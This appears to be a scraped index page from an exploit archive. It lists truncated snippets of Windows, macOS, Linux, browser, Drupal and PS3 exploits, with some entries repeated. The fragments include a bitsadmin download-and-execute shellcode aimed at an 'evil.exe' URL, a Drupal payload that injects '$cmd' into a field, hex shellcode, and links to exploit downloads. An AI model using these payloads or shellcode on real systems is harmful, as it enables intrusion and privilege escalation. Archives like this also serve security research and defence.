Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack Exploit

// Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 85724947 = 00000000051c0f13 const XulsAutomationPrefIsSet = 0x051c0f13...

Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack

Mozilla FireFox Windows 10 x64 - Full Chain Client Side Attack // Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 8572494...

macOS 18.7.0 Kernel - Local Privilege Escalation

macOS-Kernel-Exploit DISCLAIMER You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for security...

Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)

/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...

Microsoft Windows 8.1 / Server 2012 - Win32k.sys Local Privilege Escalation (MS14-058) Exploit

Exploit for windows platform in category local exploits include "hd.h" // EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte scode= 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x...

Microsoft Windows 10 (17763.379) - Install DLL Exploit

Exploit for windows platform in category local exploits edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the...

Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)

There is still a vuln in the code triggered by CVE-2019-0841 The bug that this guy found: https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/ If you create the following: GetFavDirectory gets the local appdata folder, fyi CreateDirectoryGetFavDirectory +...

Microsoft Windows 10 (17763.379) - Install DLL

edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the silent flag to hide installer UI and find another way to...

Microsoft Windows 10 (17763.379) - Install DLL

Microsoft Windows 10 17763.379 - Install DLL edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the silent flag ...

Microsoft Internet Explorer 11 - Sandbox Escape

Microsoft Internet Explorer 11 - Sandbox Escape Inject into IE11. Will work on other sandboxes that allow the opening of windows filepickers through a broker. You will gain medium IL javascript execution, at which point you simply retrigger your IE RCE bug. EDB Note Download:...

Microsoft Internet Explorer 11 - Sandbox Escape

Inject into IE11. Will work on other sandboxes that allow the opening of windows filepickers through a broker. You will gain medium IL javascript execution, at which point you simply retrigger your IE RCE bug. EDB Note Download:...

Sony Playstation 3 (PS3) 4.82 - Jailbreak (ROP)

Sony Playstation 3 PS3 4.82 - Jailbreak ROP EDB Note http://ps3xploit.com/help/dumper.html EDB Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44820.zip Dumper Help Warning: Due to the lack of proper checks after exiting the ROP chain, it is possible in...

Transmission - RPC DNS Rebinding

The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc. Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemo...

Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution

array "coderupgrade" = array "module" = "color", "files" = array"color.module" , "extensions" = array"module", "items" = array array"olddir"="test; $cmd;", "newdir"="test", "paths" = array "modulesbase" = "../../../", "filesbase" = "../../../../sites/default/files" ; $payload = serialize$a;...

Windows 7 SP1 x86 Privilege Escalation

/ Exploit Title: Elevation of privilege on Windows 7 SP1 x86 Date: 28/06-2016 Exploit Author: @blomster81 Vendor Homepage: www.microsoft.com Version: Windows 7 SP1 x86 Tested on: Windows 7 SP1 x86 CVE : 2016-0400 MS16-014 EoP PoC created from...

Havij Pro - Crash POC Exploit

Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title:Havij Pro Crash POC Tested:windows7 Sofrware Link:http://www.itsecteam.com/ Version:1.17 Email:email protected Author:email protected Team run python poc.py copy content to target click Analyze EDB-Note: tested...

Havij Pro - Crash (PoC)

Havij Pro - Crash PoC !/usr/bin/env python Exploit Title:Havij Pro Crash POC Tested:windows7 Sofrware Link:http://www.itsecteam.com/ Version:1.17 Email:[email protected] Author:M1x7e1@Safeye Team run python poc.py copy content to target click Analyze EDB-Note: tested and verified using version 1.6...

Havij Pro - Crash (PoC)

!/usr/bin/env python Exploit Title:Havij Pro Crash POC Tested:windows7 Sofrware Link:http://www.itsecteam.com/ Version:1.17 Email:[email protected] Author:M1x7e1@Safeye Team run python poc.py copy content to target click Analyze EDB-Note: tested and verified using version 1.6 Pro content = “\x41”...

BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP

Exploit for windows platform in category local exploits EDB Note, XPSP3 - my $eip = pack'V',0x7c868667; jmp ESP on kernel32.dll Date: Tue Apr 8 2014 Vendor link: http://www.blazevideo.com/download.htmm Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro App Version: 6.1 Test...

Linux Kernel 2.6.32 3.x (CentOS 56) - PERF_EVENTS Local Privilege Escalation (1)

Linux Kernel 2.6.32 3.x CentOS 56 - PERFEVENTS Local Privilege Escalation 1 / linux 2.6.37-3.x.x x8664, 100 LOC gcc-4.6 -O2 semtex.c && ./a.out 2010 [email protected], salut! update may 2013: seems like centos 2.6.32 backported the perf bug, lol. jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if yo...